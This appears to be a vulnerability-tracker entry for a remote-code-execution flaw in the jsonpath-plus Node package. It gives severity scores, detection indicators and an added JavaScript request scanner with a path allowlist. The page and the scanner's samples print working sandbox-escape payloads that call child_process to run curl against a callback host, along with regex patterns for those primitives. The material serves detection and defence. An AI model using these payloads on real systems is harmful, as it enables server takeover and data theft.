CVE-2024-21534
published 2024-10-11


Priority: P2 · 74 · critical · 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: available
EPSS: 9.08% (94.7th percentile)
All versions of the package jsonpath-plus are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute arbitrary code on the system by exploiting the unsafe default usage of vm in Node. **Note:** There were several attempts to fix it in versions [10.0.0-10.1.0](https://github.com/JSONPath-Plus/JSONPath/compare/v9.0.0...v10.1.0) but it could still be exploited using [different payloads](https://github.com/JSONPath-Plus/JSONPath/issues/226).

Detection & IOCs (extracted from sources)

Payload (`{{interactsh-url}}` is the template's out-of-band callback placeholder): `$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]`
  • Exploit payload targets POST endpoints that accept a JSON body with a 'path' key containing a JSONPath expression; the expression abuses constructor chaining to escape eval='safe' mode and executes arbitrary code via child_process.execSync.
  • Detection via out-of-band DNS callback: successful exploitation triggers a DNS lookup for the interactsh/canary URL embedded in the payload's curl call.
  • An HTTP response body containing '"result":' on a targeted endpoint indicates the JSONPath query was processed by a jsonpath-plus instance; the out-of-band callback is what confirms code execution.
  • Exploit leverages the constructor-chain pattern ''[['constructor']][['constructor']](p) to break out of the safe-eval sandbox; monitor incoming JSON POST bodies for this string pattern.
  • The eval='safe' mode jsonpath-plus uses by default replaced the vm-based evaluation behind the original CVE-2024-21534 report; that replacement is an incomplete fix, so the default configuration remains exploitable.
  • The original vector abused the Node.js vm module; multiple bypass payloads exist even after the partial fixes in versions 10.0.0–10.1.0, so treat all jsonpath-plus < 10.3.0 as exploitable.
  • The vulnerability requires jsonpath-plus to be used with its unsafe default eval='safe' mode; applications that explicitly disable eval or do not pass user-controlled input to JSONPath queries are not exploitable.
  • Red Hat downgraded impact to Low because no code paths in their affected products allow exploitation, and in OpenShift AI the direct dependency's feature requiring jsonpath-plus is never loaded.
  • Because the original vector abused the vm module and the partial fixes in 10.0.0–10.1.0 were bypassed, detection rules that match only the original vm-based payload pattern will miss the newer constructor-chain variants.
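The following is an added example, not code from this page, from the jsonpath-plus project or from the detection template the payload comes from. It does two things the bullets above ask for: `scanRequestBody`/`verdict` apply the page's indicators (the constructor-chain bypass, the `this.constructor.constructor` shape of the older vm escapes, and the `child_process`/`require` primitives both need) to a raw JSON POST body, the way a WAF rule or a SIEM parser over request logs would; `isSafeJsonPath` is an allowlist an application can apply to user-supplied paths before they reach JSONPath, one way to meet the "do not pass user-controlled input to JSONPath queries" condition. The `path` field name, the out-of-band hostname and every sample body are constructed.

```javascript
// Added example (not from the page or the jsonpath-plus project). All sample
// bodies, the "path" field name and the hostname oob.example.net are constructed.

// Indicators: the constructor-chain bypass shown on this page, the
// this.constructor.constructor shape of the earlier vm-sandbox escapes, and the
// follow-on primitives both need to reach a shell.
const INDICATORS = [
  { name: 'constructor-chain',        // ''[['constructor']][['constructor']](p) reaches Function
    re: /\[\s*\[\s*['"]constructor['"]\s*\]\s*\]\s*\[\s*\[\s*['"]constructor['"]\s*\]\s*\]/ },
  { name: 'constructor-constructor',  // this.constructor.constructor('return process')()
    re: /constructor\s*\.\s*constructor\s*\(/ },
  { name: 'process-access',           re: /\bprocess\s*\.\s*(?:mainModule|binding|env|argv)\b/ },
  { name: 'child_process',            re: /child_process/ },
  { name: 'require-call',             re: /\brequire\s*\(/ },
  { name: 'statements-in-filter',     re: /\?\([\s\S]*;/ }, // a filter that sequences statements is not a comparison
];

// Walk a parsed JSON body and collect every string value with the key path it sat under,
// so the finding can say which field carried the expression.
function collectStrings(value, keyPath = '$', out = []) {
  if (typeof value === 'string') out.push({ keyPath, value });
  else if (Array.isArray(value)) value.forEach((v, i) => collectStrings(v, `${keyPath}[${i}]`, out));
  else if (value && typeof value === 'object')
    for (const [k, v] of Object.entries(value)) collectStrings(v, `${keyPath}.${k}`, out);
  return out;
}

// Scan one raw request body. Non-JSON bodies are scanned as raw text so a payload sent
// as form data or a malformed body is still seen. Returns [] when nothing matched.
function scanRequestBody(rawBody) {
  let strings;
  try { strings = collectStrings(JSON.parse(rawBody)); }
  catch { strings = [{ keyPath: '(raw)', value: String(rawBody) }]; }
  const findings = [];
  for (const { keyPath, value } of strings)
    for (const { name, re } of INDICATORS)
      if (re.test(value)) findings.push({ keyPath, indicator: name });
  return findings;
}

// Either sandbox-escape primitive is enough to call it an exploit attempt; the supporting
// primitives alone (e.g. a bare "require(") are worth a look but not a block on their own.
function verdict(rawBody) {
  const names = new Set(scanRequestBody(rawBody).map(f => f.indicator));
  if (names.has('constructor-chain') || names.has('constructor-constructor')) return 'exploit';
  return names.size ? 'suspicious' : 'clean';
}

// Application-side guard: accept only member access, recursive descent, wildcards,
// integer indices, slices and quoted keys. Filter expressions ?( ) and script
// expressions ( ) are rejected before the path is ever handed to JSONPath.
const SAFE_JSONPATH =
  /^\$(?:\.(?:\*|[A-Za-z_][\w-]*)|\.\.(?:\*|[A-Za-z_][\w-]*)?|\[(?:\*|-?\d+(?::-?\d+)?|'[^'\\]*'|"[^"\\]*")\])*$/;

function isSafeJsonPath(path) {
  return typeof path === 'string' && path.length <= 512 && SAFE_JSONPATH.test(path);
}

// Constructed samples: the page's payload with the callback host replaced, the older
// vm-escape shape nested one level deeper, and a legitimate price filter.
const SAMPLES = {
  constructorChain: JSON.stringify({
    path: `$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl oob.example.net').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]`,
  }),
  vmEscape: JSON.stringify({
    query: { path: `$..[?(this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id"))]` },
  }),
  benign: JSON.stringify({ path: `$.store.book[?(@.price < 10)].title` }),
};

for (const [label, body] of Object.entries(SAMPLES)) {
  console.log(label.padEnd(17), verdict(body).padEnd(11),
    scanRequestBody(body).map(f => `${f.keyPath}:${f.indicator}`).join(' '));
}
console.log('allowlist:', isSafeJsonPath('$.store.book[0].title'),
  isSafeJsonPath(JSON.parse(SAMPLES.benign).path),
  isSafeJsonPath(JSON.parse(SAMPLES.constructorChain).path));
```

The two halves deliberately disagree on the benign sample: the scanner leaves `?(@.price < 10)` alone because a real filter is not an indicator, while the allowlist rejects it because any filter expression is evaluated and therefore exposed to this class of bug. An application that genuinely needs filters should express them outside the path (a fixed query with the user's value passed as data) rather than widen the allowlist.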

CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| ghsa | | 9.8 | CRITICAL | |
| osv | | 9.8 | CRITICAL | |
| vulncheck | | 9.8 | CRITICAL | |
| vendor_redhat | | 9.8 | CRITICAL | |